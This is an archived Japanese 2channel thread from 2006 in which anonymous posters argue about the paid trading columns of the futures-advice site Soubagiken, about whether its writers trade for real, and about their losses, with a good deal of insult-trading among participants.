5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

相場技研 3コラム目

1 :名無しさん@大変な事がおきました:2006/09/12(火) 10:43:55 ID:RHAlmjtK

相場技研前スレ
http://money4.2ch.net/test/read.cgi/deal/1156974327/
相場技研Bull and Bear
http://www.soubagiken.com/

技研について語るスレです。
根拠なき憶測だけでの誹謗中傷厳禁。
相場のシミュレーション等は該当スレで行うこと。


2 :名無しさん@大変な事がおきました:2006/09/12(火) 11:25:25 ID:euXDIYrP
>>1
場中にこんな糞スレ建てるな
ごくわずかな実働会員しかいないのに、スレを乱立させるな
阿呆の巣窟という決定的証拠
まずスレ主のおまえが語れ!


3 :名無しさん@大変な事がおきました:2006/09/14(木) 22:35:14 ID:kgu45Bl1
age

4 :名無しさん@大変な事がおきました:2006/09/15(金) 12:26:06 ID:63gqpOvb
age

5 :名無しさん@大変な事がおきました:2006/09/15(金) 12:33:57 ID:P+6Z7tIr
ここも

6 :名無しさん@大変な事がおきました:2006/09/15(金) 13:20:45 ID:63gqpOvb
あげ

7 :名無しさん@大変な事がおきました:2006/09/15(金) 17:02:44 ID:UpOVwMQ2
技研執筆者のこと書くカバワラ工作ちゃんがうるさいw
俺は単なる叩きじゃなくて、技研に期待もしているんだがねぇ

8 :名無しさん@大変な事がおきました:2006/09/15(金) 18:13:07 ID:63gqpOvb
ここが本スレです。

9 :名無しさん@大変な事がおきました:2006/09/15(金) 21:13:09 ID:LOMVrQcT
ゆう○ってあれが、やってるってのでいいんだよね。

10 :名無しさん@大変な事がおきました:2006/09/15(金) 21:36:31 ID:OxUNFFo0
あきやまという人、ほんとに玉いれてないみたいだね。
脳内トレードで、なにが楽しいんだろうかね

11 :名無しさん@大変な事がおきました:2006/09/15(金) 21:44:21 ID:LOMVrQcT
俺は、そうは思わないけどな。そういう小細工する人ではないと思う。

12 :名無しさん@大変な事がおきました:2006/09/16(土) 08:05:30 ID:FMeIGLB5
間違いなくうそトレードらしい。
少々トレードはしてるだろうが、素人に毛が生えたくらいで、
基本的に利食いは早く損切が遅いのが致命的。
鞘の逆張りなんぞ、初歩の段階なので、成長してないということ。
いつしか、情報提供サイトの広告目的になってたのでしょう。



13 :名無しさん@大変な事がおきました:2006/09/16(土) 13:36:37 ID:LUStD7Bz
>>12 間違いなく・・・・・・らしいって、信頼性に欠ける情報だね。

14 :名無しさん@大変な事がおきました:2006/09/16(土) 15:02:18 ID:ZAYts0CL
コラムは何回も見てきたが、秋山氏はまとも、だと思う。ひどいのは他に何人かいるよ。

15 :名無しさん@大変な事がおきました:2006/09/17(日) 12:16:11 ID:1d+HHRc7
あげ

16 :名無しさん@大変な事がおきました:2006/09/17(日) 13:23:13 ID:1d+HHRc7
Loop出現につき、あげ。

17 :名無しさん@大変な事がおきました:2006/09/17(日) 14:09:39 ID:X4cz2z2r
では、こちらが本スレということで。

18 :名無しさん@大変な事がおきました:2006/09/17(日) 14:39:12 ID:NGb+F9Oi
無能極まりないスレ主の必死過ぎる工作活動

19 :名無しさん@大変な事がおきました:2006/09/17(日) 14:54:37 ID:1d+HHRc7
あげ

20 :名無しさん@大変な事がおきました:2006/09/17(日) 15:32:08 ID:8HzfxZWC
あっちには、無視するんだっけ?

21 :名無しさん@大変な事がおきました:2006/09/17(日) 19:28:56 ID:Gnu0/nHd
獣王さんも落ちたなあ・・・
実質敗北宣言だな・・・
他のコラムの儲けを回して資金枠再設定って・・・
ゴムしか見ていない人もいただろうに・・・
追加資金に頼りっぱなしの人たちよりかはましだろうが・・・


22 :名無しさん@大変な事がおきました:2006/09/17(日) 19:33:57 ID:Gnu0/nHd
過去書いてた執筆者にも、もう化石のように更新されずに
そのままの人がたくさんいる
きれいさっぱり削除して、今更新している人だけにしたら
もっと見やすくなるのだが?

ここで指摘せんで、技研に直接言えば良かったかw

23 :名無しさん@大変な事がおきました:2006/09/18(月) 00:16:06 ID:nu9nGtsG
獣王さんのは許されるのか?
地雷君と一緒じゃないのか?

24 :名無しさん@大変な事がおきました:2006/09/18(月) 00:22:08 ID:YE5WxHnv
彼らは儲かってるよ。
ハナから相場張ってないので相場で負けてないし、
情報提供料金で儲かってる。
実際に金額を書くことでいかにも張ってるかのうような錯覚。
なかなかおいしいビジネスモデルですね。相場情報提供って。

その情報料で設けた資金でチョビットなら相場で増やそうというところでしょう。
真の情報っていうのは、金払って得るんじゃなくて、足でとってくるもんなんだよ。

by わんがん

25 :名無しさん@大変な事がおきました:2006/09/18(月) 01:05:32 ID:2QDeQmMT
俺は獣王さんに限っていえば、バーチャルでは無いと思う。
他の人は知らないけどw
なんか、臨場感は伝わってくるよ
地雷君こそバーチャルだろ。バーチャルでなければよほどの金持ちか?
じゃなきゃ、あんなに何度も飛んでるのに、涼しい感じで追加資金入れるとか、出直しますとか書けんだろうよ

26 :名無しさん@大変な事がおきました:2006/09/18(月) 02:58:34 ID:SpsW5blY
ゆうこさんのが一番安全ぽいですね

27 :名無しさん@大変な事がおきました:2006/09/18(月) 05:02:51 ID:m9AbUESn
バーチャルでも良いと思う。要は当たれば良いのさ。
それから追加資金だって良いじゃない。
資金無くなったので粗糖やめますってわけにいかないだろ。
でも、獣王のあの言い方は言い訳じみて見苦しい。
すみません。追加資金で粗糖再出発します。
のひとことで良いものを。

28 :名無しにしとこ^^;:2006/09/18(月) 06:20:36 ID:RGxheGJZ
汚まえさまたち。汚はようございます。。
連休の夜中にどうでもいい汚話しですか。。汚疲れさまです。
ボクは、じじいなので朝早起きです^^;
あのね、技研さんは技研さんの考えで。。
獣王さんは獣王さんの顧問手法でやってるわけですね。
汚まえさまたちの外野の浅はかな、汚考えでは計り知れないのですな。
>>26さん。安全なんてあるわけないでしょ。
相場はどこにいっても危険が汚っぱいいっぱいです^^


29 :名無しさん@大変な事がおきました:2006/09/18(月) 06:31:45 ID:BPyOH/Q9
前スレが大分残っているじゃないか。このスレは 前スレを使いきるまで使うなよ。





30 :名無しにしとこ^^;:2006/09/18(月) 06:45:52 ID:RGxheGJZ
すみません^^
といいますか。。。
なんでこんなに技研さんのスレッドがあるでしょ?
それだけ、技研さん宣伝になるので良いのでしょうが^^;
話題になるだけ、大したものだと思います。
他の無名顧問さんにしてみれば。。。
「誹謗中傷叩きでも良いから2chで名を売りたい」って思っているでしょう^^
それを考えれば、粘着腐れ名無しくんたちが一番の技研宣伝部隊ですね。
みていて、こいつら汚馬鹿ですけど、そこはグッと堪えて。。
「宣伝、汚疲れさまです。1スレ当たり技研プリペイド100円分進呈します」
って、技研さんで報酬だせば面白いですね^^;

31 :名無しさん@大変な事がおきました:2006/09/18(月) 08:51:02 ID:2QDeQmMT
おやおや、早速工作員のお出ましかw
お前もスレ2でくだらんポジション書いてろや
こっちくんな、汚前w

32 :名無しさん@大変な事がおきました:2006/09/18(月) 11:41:43 ID:XVcd4mgx
コラムの期間に問題があるのよ
だいたい顧問は1週間単位で最高5000円で設定

調子が悪くても週単位で顧問は新スレたてる
新しく会員からお金取るから玉建てる
それがまた曲がる悪循環

まれに1週間で利益出なかったら新スレたてずに
新しくお金とらずに旧スレで続行する人もいるが

33 :名無しさん@大変な事がおきました:2006/09/18(月) 12:19:13 ID:SMsRFhtx
いやならコラム買わない。ただそれだけのこと。
文句言っても始まらんでしょ。

34 :名無しさん@大変な事がおきました:2006/09/18(月) 15:08:09 ID:YE5WxHnv
あたる、曲がる以前に、ペーパートレードが気に食わない。

35 :名無しさん@大変な事がおきました:2006/09/18(月) 15:12:07 ID:SMsRFhtx
なんで?

36 :名無しさん@大変な事がおきました:2006/09/18(月) 15:15:32 ID:SMsRFhtx
っていうか、気に入る気に入らないは>>34の勝手ですね。
気に入らなければ一人で騒いでいればいいだけのことですな。
その騒ぎを見てあげるから、さあどうぞw

37 :名無しさん@大変な事がおきました:2006/09/18(月) 15:19:48 ID:afkGJPaQ
技研スレクオリティが、発動していますね

38 :名無しさん@大変な事がおきました:2006/09/18(月) 15:31:26 ID:SMsRFhtx
馬鹿な名無しが糞垂れ流してますからねえ。

39 :名無しさん@大変な事がおきました:2006/09/18(月) 15:37:12 ID:2QDeQmMT
静観していた応援部隊の反撃でっかw
目糞鼻糞を笑うってか〜www

40 :名無しさん@大変な事がおきました:2006/09/18(月) 15:41:53 ID:2QDeQmMT
下位執筆者の体たらくを会員が暴露、ほどなく誘導工作員が登場し
スレ掻き回して次は文体がアレにそっくりの名無しが投稿名無しを攻撃w

これ以上叩かれたくないのはだあれwww


41 :名無しさん@大変な事がおきました:2006/09/18(月) 15:56:32 ID:SMsRFhtx
だからさ、気に入らなけば見なきゃいいだけ。
馬鹿なやつに合わせるほど技研も馬鹿じゃないからねえ。
便所の落書き2ちゃんで主観的な大騒ぎしろよ。
馬鹿だねえってげらげら大笑いしてやるから。
さあ、どうぞw
>>これ以上叩かれたくないのはだあれwww
利口に叩かれればショックだけど、腐れ名無しに叩かれれば名誉なのよ。
腐れ名無しは馬鹿だろ?馬鹿にほめられるってことは、同類馬鹿ってなるからねえ。
馬鹿名無しどもよ。叩き放題叩け!www

42 :名無しさん@大変な事がおきました:2006/09/18(月) 16:03:08 ID:2QDeQmMT
あれえ〜ww
俺はお前のこと指摘したわけじゃなかったのに、
なぜそこまで熱くなるんだwww
お前、関係者でっか〜www


43 :名無しさん@大変な事がおきました:2006/09/18(月) 16:16:53 ID:SMsRFhtx
俺はおまえに指摘されたとは思ってないぞw
俺は、おまえら糞名無しを煽って、糞レスが見たいだけねえ。
さあ、早く技研叩き糞レス見せてくれよ。
早く、馬鹿さ加減を見せてくれや。げらげら。

44 :名無しさん@大変な事がおきました:2006/09/18(月) 18:26:09 ID:jB3Dr6F/
ここって技研会員の感想をどうぞってことで始まったのでは?

会員の感想だけならわかるけど、その投稿を馬鹿にしたり突っ込むって

どうしても技研の仲間に見えてしまうけど?

第三者ならもっと冷静に書けるのでは?

端から見ると損した技研の客と、技研の人との罵り合いに見える

結局、一番儲かる人は誰なのさ?






45 :名無しさん@大変な事がおきました:2006/09/18(月) 19:12:06 ID:SMsRFhtx
そもそもまともな苦情なら技研に言えば良いだけ。
糞名無しは徹底的に叩き潰す。IDIP改良版で武装もしてw

46 :名無しさん@大変な事がおきました:2006/09/18(月) 19:30:17 ID:aFpW/4sv
俺の勘働きだが

さすがに技研関係者とばれるという心理が働かないのはおかしい。

だってさ、考えてみ?

儲かっている会員・・・・これ以上お客増やしたくない。会員は減って欲しい。(これが普通だよな。当たり前)
儲かってない会員・・・・これ以上被害者を増やしたくない。これ以上技研がネット予想で儲けるのは我慢できない。だから叩く潰す(まあこれもごく当たり前)
どうでもいい会員・・・・そもそも書き込まない(そういう考えが無い、情熱も無い、2chやらない。面倒、このスレも知らない)

そうなるとですね。。。

1・アンチの会員でありながら、間抜けな技研関係者を装う巧妙なアンチ技研や同業者。

2・バレバレなのに出てきた間抜けな技研執筆者や運営者たち

3・ただ暇なのでスレを荒らしてみたかった。反応が面白い。(これもまたありえるが余程の暇人というか精神病的)

4・負けすぎてわけが分からなくなった、あるいはお客が減って頭に来て、冷静な対応や判断が出来なくなった運営側や執筆側。


このどれかなのは間違いないよね。

そうなると濃いのは状況証拠や言質から考えると、、、2、4、3、1、とか
こういう順番なんですな。 さて



47 :名無しさん@大変な事がおきました:2006/09/18(月) 19:33:17 ID:SMsRFhtx
ヒマなやつ。
そんな長文書いて自分のためになるん?w

48 :名無しさん@大変な事がおきました:2006/09/18(月) 19:34:58 ID:aFpW/4sv
否定はしないようですな。否定して欲しいんだけどなあ。
あとこのくらいは長文ではないでしょう。ブラインドタッチ
ならこの程度は2〜3分ですよ。


49 :名無しさん@大変な事がおきました:2006/09/18(月) 19:37:00 ID:SMsRFhtx
儲かってない会員・・・自分の馬鹿さ加減に気がつかない。

会員が馬鹿なんだよ。単純な提灯で儲かるわけねえだろ。


50 :名無しさん@大変な事がおきました:2006/09/18(月) 19:43:46 ID:SMsRFhtx
外野の人間・・・・そもそも書き込まない(当たり前)
俺・・・・糞馬鹿名無しを煽りたい(当たり前)

51 :名無しさん@大変な事がおきました:2006/09/18(月) 19:46:06 ID:aFpW/4sv
全くそのとおりです。断言します。顧問や提灯で大儲けした人は
宝くじで1億円以上を当てた人と比べても割合的にも数字的にも
間違いなく少ないです。じゃあ宝くじでもやってたほうがいいですよね。

複雑な提灯うねり取りや提灯鞘取りなどというのがあるとして、それは
普通のテクニカルよりも難しい面があるでしょう。多分すぐに玉建てすぎ
になると思います。そして損切りポイントがわからなくなるでしょうね。


52 :名無しさん@大変な事がおきました:2006/09/18(月) 19:49:10 ID:A5TGPqvv
>>50
あんたは外野じゃないわけ?

53 :名無しさん@大変な事がおきました:2006/09/18(月) 19:53:01 ID:aFpW/4sv
提灯売買は勉強になりそうで全く勉強にもならないですから、本でも2〜3冊
買って自分で検証やシミュでもして全部自分で考えて売買したほうが間違いなく
勝てるようになる。



■金を落とすなら 顧問の財布にではなく  相場に落とせ■

※場には金が埋まってもいるが、顧問の財布には出て行ったきりですよ。
 方や取り返しがきく勉強代&授業料、方やバカを騙して負け組みから
 さらに金をむしり取る手法。

★落とすなら 相場に落とせ 金と玉

54 :名無しさん@大変な事がおきました:2006/09/18(月) 19:53:07 ID:A5TGPqvv
>>47
あなたこそ12時から粘着してるみたいだけど、暇なの?

55 :名無しさん@大変な事がおきました:2006/09/18(月) 20:01:13 ID:SMsRFhtx
ヒマw
相場で儲かりすぎちゃってさ。
やることねえーのよ。
>>52俺?審判w

56 :名無しさん@大変な事がおきました:2006/09/18(月) 20:56:27 ID:jB3Dr6F/
なぜ55がここまで執拗に書き込むかも何か変だよ?

糞名無しを徹底的に叩き潰すとか書いてるし。外野とか審判ならなぜそこまで?

これが技研の書き手や運営関係者ならすべて納得できるわけだし。

Loopとかいう人が来なくなったら、次は徹底的に潰すとか会員は馬鹿だとか。

力が入りすぎてるよ。

誰が上手いのか、下手なのか。なぜ上手い・下手なのか。客観的なとこが知りたい。

57 :名無しさん@大変な事がおきました:2006/09/18(月) 22:22:07 ID:SMsRFhtx
執拗に?馬鹿じゃね?
執拗なのは糞名無しどもだろうが。


58 :名無しさん@大変な事がおきました:2006/09/18(月) 22:24:00 ID:SMsRFhtx
>誰が上手いのか、下手なのか。なぜ上手い・下手なのか。客観的なとこが知りたい。
会員になって、中身見りゃいいじゃねえか。
便所の落書きで正確な情報が得られるとでも思ってるのか?



59 :名無しさん@大変な事がおきました:2006/09/18(月) 22:32:21 ID:jB3Dr6F/
ああ、あんた以前にもいろいろ書いてた人だな。

他の人にも絡んでいただろ。<馬鹿じゃね>とか、特徴的だから覚えてる。

なんだっけ、野菜作ってネットで売っていた人だっけ?違ったかな?

ここは誰が何でも書いていいとこじゃなかった?

損した人が愚痴や文句書いてもいいんじゃないの?

言論を封殺するような突っ込みするから関係者と間違われるんだよ。


60 :名無しさん@大変な事がおきました :2006/09/18(月) 22:35:29 ID:LIRPjV0L
LOOPって何者?

ストーカー?

61 :名無しさん@大変な事がおきました:2006/09/18(月) 22:40:47 ID:aFpW/4sv
この書き方は「ロバート てんおう ジュウオウ  秋山 かまたり 運営者」
この6〜7人のうちの仮の名無しの姿だと思う。文章や言い方文法にある癖がある。
それも一つや二つではないからね。私にも他の人にもどうしても隠せない独特の
クセや言い方に単語に文法ってのがあるからね。もちろん一人3役とかやってたら
誰かが重複しているかも知れないし、この仲の誰かが架空の人間なのかもしれないね。

62 :名無しさん@大変な事がおきました:2006/09/18(月) 23:12:19 ID:m9AbUESn
そいつらの、馬鹿じゃね?発言のソース希望。どこに書いてある?

63 :名無しさん@大変な事がおきました:2006/09/18(月) 23:13:30 ID:ULSv1DmH
秋山というネット・キャラクターに突っ込んだ言及がなされる時には
昔から毎度同じパターンの展開になる
今回もそのまま予想通りの展開

これが、表面からはうかがえない秋山の本質の一つ

64 :名無しさん@大変な事がおきました:2006/09/18(月) 23:17:12 ID:jB3Dr6F/
技研スレの1から丹念に読んでみて。面倒だろうけど。

株やってる人に絡んでいたんだっけな。

やたら馬鹿じゃねって書いてたから覚えてる。


秋山って人の話題になると、昔もこんな展開だったの?





65 :名無しさん@大変な事がおきました:2006/09/18(月) 23:55:26 ID:m9AbUESn
>>64
たったそれだけ?


66 :名無しさん@大変な事がおきました:2006/09/19(火) 00:01:13 ID:jB3Dr6F/
それだけだよw

自分のことじゃないから詳細に覚えてはいないが、馬鹿じゃね、は印象的だし。

1から2にかけて丹念に読んでみれば見つかると思うw

67 :65:2006/09/19(火) 00:11:34 ID:PFM24UMS
なんだそれだけか。
秋山はわかったけど、あとの連中はどこでいってたん?

68 :名無しさん@大変な事がおきました:2006/09/19(火) 12:50:29 ID:Q7p9jjMi
masaも撃沈したのか。
これで好調はゆうこだけ?
masaもプラチナのコラムはまだかなりの利益を残しているみたいだが。
地雷はひでえなw
追加資金入れまくりじゃないかw

69 :名無しさん@大変な事がおきました:2006/09/19(火) 13:22:16 ID:zOD/+VaK
地雷どころでは、なくなってきたね。
執筆者の技量云々では無くなってきて、
技研としての看板がヤバいような気がするけど。


70 :名無しさん@大変な事がおきました:2006/09/19(火) 13:30:48 ID:Q7p9jjMi
大看板の秋山が底を脱した感はあるけど、
獣王以下はきついみたいだね
中堅どころはそれなりに?
地雷君はありゃよく顧問やってられるわw

71 :名無しさん@大変な事がおきました:2006/09/19(火) 13:38:17 ID:zOD/+VaK
看板というのはそういう意味でなくて、
地雷を雇っているような技研の信用性という意味で
地雷の信用性は無いのはもちろんだが
地雷を雇っている技研の姿勢という意味。

72 :名無しさん@大変な事がおきました:2006/09/19(火) 13:44:59 ID:Q7p9jjMi
そうか、こりゃすまん

看板か、確かにこのままじゃね〜ww

もっと上手い人いるだろうに?芳名録とかに。


73 :名無しさん@大変な事がおきました:2006/09/19(火) 14:28:35 ID:9oqFV34f
masaは安定して利益あげるタイプと睨んでいたが曲がっちまったか。
彼は商話のころから見てたが我慢しすぎる傾向があるからなー

74 :名無しさん@大変な事がおきました:2006/09/19(火) 15:02:26 ID:zOD/+VaK
>>72
こちらこそ、細かいこと言ってすまんかった。
確かに、このままじゃ執筆者だけのせいにするわけにもいかんじゃろうて。
技研の運営にも責任があるんじゃまいか?

75 :名無しさん@大変な事がおきました:2006/09/19(火) 17:06:45 ID:PX4ZwiO/
地雷というのは外からわからないけど踏んでしまって致命傷を負うもの

8月26日の時点 
追加投入 1,000,000
9月4日
追加投入 4,500,000 先週比+3,500,000
9月11日
追加投入 6,500,000 先週比+2,000,000
9月19日
追加投入 8,500,000 先週比+2,000,000

外から見ても”なんかしかけてあるぞこれ”とわかる場合はもはや地雷とは呼べない?なんと呼んだらいいのか
毎週報告をしてくれるのは正直でよろしいのだが、この人は何を目的としているのだろうか
年末までに追加投入がどこまで増えるのかを楽しんでください、という意図なのか

76 :名無しさん@大変な事がおきました:2006/09/19(火) 17:26:40 ID:otA6Lued
>>73
所詮、masaも獣王と同じで相場の転換点を読む能力がないんだな。


77 :名無しさん@大変な事がおきました:2006/09/19(火) 17:38:28 ID:hYaldqMv
★[9月25日からのコラム運営]

現在お分かりのように主力のゴムコラムが苦戦しており、何とか損を
取り返すべく戦っている訳ですが、焦りが焦りを呼び、悪循環の流れが
続いております。その為、他の人気が無く利益が出ているコラムを商品総合
として一本化し、ゴムコラム資金へ流用という形を取り、コラム本数を3本
で運営していきます。

★但し、無かったお金を追加で持ってこようとは思いません。
あくまで他のコラムでプラスになっている利益分だけを再分散し、健全化
しようと考えた次第です。
ま、これは通常相場を張っている一般投資家が普通に行う行為ですので
リアルな事、、、というか、本来当たり前の事をしようとしているだけなので
ご了承下さい(^^;

本格的に技研で執筆を始めたのが今年初めからなので、自分のコラム運営
方法に無理が生じる事を想定できていませんでした。
その点は深くお詫び申し上げます。



78 :名無しさん@大変な事がおきました:2006/09/19(火) 17:39:14 ID:Q7p9jjMi
地雷君はほんとすごい人だよw
短期で10倍化か、資金溶かしてしまうかのどちらか。
この確率が半々ならばまだ丁半博打感覚で楽しめるんだが
実際には追加資金頼みか、出直しま〜すがほとんどだもんな。
地雷君と比べたら、他の執筆者はかなり慎重に見えてしまうw

79 :名無しさん@大変な事がおきました:2006/09/19(火) 17:41:20 ID:hYaldqMv
[9月25日以降からは・・・]
現在!      純粋損益(累計含む)
@ゴムコラム  (−  792,500円)
Aコーヒーコラム(+  558,000円)
B粗糖コラム  (−  369,500円)
C白金コラム  (+1,500,000円)←現コラム値洗い+分含む
D緊急コラム  (+  471,500円)
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
 合計損益   (+1,367,500円)

9月25日以降から!
@ゴムコラム     (100万円)
A全商品総合運用コラム(200万円)
B緊急企画コラム   (136万円)←この一週間で1○○万は変動あり。
今回からは緊急コラムも資金枠を設定しました。
但し、使用する証拠金は50万が限度にすると思います。

今回もしも他のコラムも損失を出していたら、実践的に充当するお金が
無かった訳ですから、技研は引退せざるを得なかったと思います(−−;
それくらいの意識で執筆している事をご理解頂ければ幸いであると同時に
全てのコラムを観覧して頂いた場合の状況ですから、どれか一つのコラム
を開いてて、それで曲がって資金を減らす可能性もご理解下さい。

メインコラムが壮絶を極めてきました!
しかし、最後の最後までできる限りの事をやり、投げやりになる事だけは絶対にしません。
それと、どんなに無様な状況になっても包み隠さず報告します。
途中で突然執筆を辞めたり、逃亡、言い訳をする気も毛頭ない。絶対にやり抜く所存です!

その上で最終的に勝つ。それしか会員様に対する恩返しが見つからん。
そうは言ってもゴムコラムの去年からの累計プラス分を充当しても
25万円弱しか累計プラスがないので、現状を何とかして復活するしかない・・・それしか無い!!!


80 :名無しさん@大変な事がおきました:2006/09/19(火) 17:46:41 ID:Q7p9jjMi
獣王は追い証で追加資金入れるくらいなら技研引退するって断言したんだよね?


81 :名無しさん@大変な事がおきました:2006/09/19(火) 17:46:43 ID:IEsQsJ/U
少しでも儲けてもらいたい、少しでも取り返してもらいたい

そういう親心じゃないかよ、当たり外れは抜きにして

暖かく見守ってヤレ

82 :名無しさん@大変な事がおきました:2006/09/19(火) 17:49:14 ID:9oqFV34f
>>76
どうなんだろな。
ただmasaは少なくとも資金を飛ばすことはないと思うし、俺が知る限りでは、かなり上手い部類だぞ。


83 :名無しさん@大変な事がおきました:2006/09/19(火) 17:49:55 ID:Q7p9jjMi
親心ってw
なんでもいいから金増やしてこそ子は喜ぶw

84 :名無しさん@大変な事がおきました:2006/09/19(火) 18:11:05 ID:Q7p9jjMi
>>75

85 :名無しさん@大変な事がおきました:2006/09/19(火) 18:16:24 ID:Q7p9jjMi
ミスった!
75の書いてることがツボにはまってついwww
もう地雷じゃないよな、これだけあからさまだと
なんだろ、必ず自爆するから・・w
人間魚雷とかテロリストみたいなもんか?

86 :名無しさん@大変な事がおきました:2006/09/19(火) 18:35:45 ID:otA6Lued
>>80
いつ?どこで?

87 :一年生:2006/09/19(火) 18:44:38 ID:Kv8fTLP5
>>49
俺もそう思う。実は提灯付ける方も同等の相場観、技量が必要だ。


結論 自分で相場張った方がいい。

顧問なんぞは、超初心者や曲がってるのを見て楽しむ為にある。

88 :名無しさん@大変な事がおきました:2006/09/19(火) 19:59:25 ID:fEvPtpsk
>>79
>どれか一つのコラムを開いてて、それで曲がって資金を減らす可能性もご理解下さい

これは全部買って読めということなの?

89 :名無しさん@大変な事がおきました:2006/09/19(火) 22:09:49 ID:lk5PT9+k
執筆者の人達は馬鹿じゃないと思う。

馬鹿なのは、わけもわからず、わざわざ金払って情報(脳内トレード)を得ようとする(得れてないし)
サイトの会員の人たちでしょ。

まじ頭悪りいと思う。

90 :名無しさん@大変な事がおきました:2006/09/19(火) 22:16:13 ID:Q7p9jjMi
>>86
獣王の会員だった人が書いてた
会員向けに飛ぶくらいなら執筆止めるってさ
今年の話だよ

91 :アドバイス:2006/09/19(火) 22:31:15 ID:lk5PT9+k
曲がるあたる以前の問題。
素直にトレードスタイル見直してみたら?たかだか、4年、5年程度相場しただけでねぇ。

相場で勝つ前に自分に勝たないとね。
負けを認める勇気と潔さ。
損切する癖をつける事。
逆張りするならなおさら必要だと思うけどなぁ。
笑って損切で切れるようなら一人前。
そこから倍返しでドテンしてくる人は達人。



92 :名無しさん@大変な事がおきました:2006/09/19(火) 22:37:07 ID:Q7p9jjMi
たかだか4年、5年程度、だと!
何を言うか!偉大なるビーチリー大先生はたかだか2年弱で執筆者を務めておるぞ!
上手い下手は経験の長さではない!

…と言いたいんだろうね、ひよこちゃんはwww

93 :名無しさん@大変な事がおきました:2006/09/19(火) 23:04:52 ID:zOD/+VaK
性悪女ビーチクパーチクひよこのこは論外。


94 :名無しさん@大変な事がおきました:2006/09/20(水) 02:11:15 ID:MXPowMMN
素人予想屋ども、明日の朝は全員沈没だな。

今月中には技研の屋台も店仕舞いかな。

95 :名無しさん@大変な事がおきました:2006/09/20(水) 04:51:38 ID:CkCEi1Ti
>>89
禿しく同意じゃ!

96 :名無しさん@大変な事がおきました:2006/09/20(水) 09:29:56 ID:gB50/7ED
この暴落で、、
てんおう、獣王、masaは、逝ってしまいました。


97 :名無しさん@大変な事がおきました:2006/09/20(水) 09:51:36 ID:NBa8xWvO
>>96
そうなん?masa氏もボロボロに?
プラチナはまだかなり含みあったんじゃ?
獣王氏、てんおう氏は苦戦してるみたいだね。

98 :名無しさん@大変な事がおきました:2006/09/20(水) 13:50:50 ID:gB50/7ED
masa、旬を狙い打ち、、、
masaが打ち落とされて撃沈ぶっ飛び。

99 :名無しさん@大変な事がおきました:2006/09/20(水) 14:05:05 ID:Z4OZrYfL
技研コラムの稼ぎってどのくらいあるのかね

100 :名無しさん@大変な事がおきました:2006/09/20(水) 16:18:04 ID:Ha3676Ye

582 名前:名無しさん@大変な事がおきました :2006/09/20(水) 16:15:16 ID:GairAfjp
きっとアメリカで秋山さんのポジション狙われてるんだよ
NYは秋山さんの逆ばかり動いてるしね

583 名前:名無しさん@大変な事がおきました :2006/09/20(水) 16:16:50 ID:GairAfjp
秋山さん世界中の標的になってるんだよきっと



101 :名無しさん@大変な事がおきました:2006/09/20(水) 17:24:38 ID:NBa8xWvO
新しい執筆者登場しないかな?
役に立たない下位と入れ替えてほしい
猫火鉢さんとか、ずいぶん前からこの下げ予想してたろ
言っておくが本人じゃないぞw


102 :名無しさん@大変な事がおきました:2006/09/20(水) 18:18:56 ID:6mAA5tzL
>>101
>ずいぶん前からこの下げ予想してたろ
その売りに乗ってぼろ儲けしたのか?

103 :名無しさん@大変な事がおきました:2006/09/20(水) 19:14:07 ID:NBa8xWvO
ボロ儲けとまではいかないが、ゴムで結構儲けさせてもらったよw
俺も半信半疑でこの人の投稿読んでたから。もっとたくさん売ってれば良かったよ

104 :名無しさん@大変な事がおきました:2006/09/20(水) 19:23:49 ID:6mAA5tzL
提灯を自慢するとは恥ずかしいものだ。
俺には相場分析能力がありませんのでって言ってるようなもんだ。
技研会員の提灯バカと同じだなw

つうか、なんでおまえが入れ替えを望む?
入れ替え望まなくても猫なんとかっていうやつの提灯で儲けたんだろ?
わけがわかんねえやつだな。



105 :名無しさん@大変な事がおきました:2006/09/20(水) 19:35:01 ID:Z4OZrYfL
>>101
あれは口張りだろ。話にならん

106 :名無しさん@大変な事がおきました:2006/09/20(水) 19:40:33 ID:NBa8xWvO
あ?絡んできたのか?
提灯を自慢?カキコのどこか自慢なんだ?
分析能力はあったほうがいいだろうさ。それよりとにかく儲けが上がるほうがいいな、こっちはw

お前、下の執筆者か?
赤の他人にそこまで絡むのもなw

俺は昔会員だったんでねw
上手い奴がいろいろアドバイスしてくれたほうが儲かるんだよ
とにかく儲け第一ww

107 :名無しさん@大変な事がおきました:2006/09/20(水) 19:43:55 ID:6mAA5tzL
↑人のふんどしでしか相撲が取れない馬鹿の見本。


108 :名無しさん@大変な事がおきました:2006/09/20(水) 19:44:28 ID:Z4OZrYfL
>>106
wwを多く使うヤツはとぶ。絶対の法則

109 :名無しさん@大変な事がおきました:2006/09/20(水) 19:53:33 ID:NBa8xWvO
>>108
104に返したんだからな、勘違いしたらすまんな

>>107
はいはい、下の執筆者か、今回の下げで腐ってる奴のどちらかだなw
利害の無い他人がいきなり絡むのも変だぜぇ〜
ま、せいぜい稼いでやw

110 :名無しさん@大変な事がおきました:2006/09/20(水) 19:57:32 ID:qhFyOcWc
このスレをわざわざ作った困ったチャン厨房が、また暴れているな

滑稽劇、いつもご苦労様

111 :名無しさん@大変な事がおきました:2006/09/20(水) 19:57:48 ID:NBa8xWvO
それとさあ、なにも猫火鉢さんじゃなくてもいいのさ
上手けりゃ誰でもいい

儲けてる奴は他人にいきなり絡まないもんな〜w
それとも新たな工作員ってことですかー

112 :名無しさん@大変な事がおきました:2006/09/20(水) 19:57:56 ID:6mAA5tzL
はあ?技研否定者、提灯否定者の俺がなんで技研執筆者なんだよ。
しかも、会員までにさせられるってか。
読みが反対なんだよ。相場も売りと買いとを反対に読んでしまうやつなんだろう。
だから、人に頼っての提灯家業か。お笑いだな。


113 :名無しさん@大変な事がおきました:2006/09/20(水) 20:00:25 ID:6mAA5tzL
>上手けりゃ誰でもいい
情けねえやつだ。能力ねえから提灯家業。



114 :名無しさん@大変な事がおきました:2006/09/20(水) 20:02:08 ID:NBa8xWvO
ならばなぜいきなり絡む?バカだのなんだの
俺のカキコがお前に迷惑かけたのか?
これが2ちゃんってやつかw

115 :名無しさん@大変な事がおきました:2006/09/20(水) 20:04:42 ID:6mAA5tzL
>>109
>>108
104に返したんだからな、勘違いしたらすまんな

アホまるだし。
誰に返そうが関係ない。
>>108はwを多用するヤツは飛ぶ。って言ってるだけじゃん。
NBa8xWvO←こいつ、読みは反対だし、ピントはずれてるし。
まあ、そんなアホだから自分で相場張る能力ないから、提灯家業なんだな。
大笑いだな。



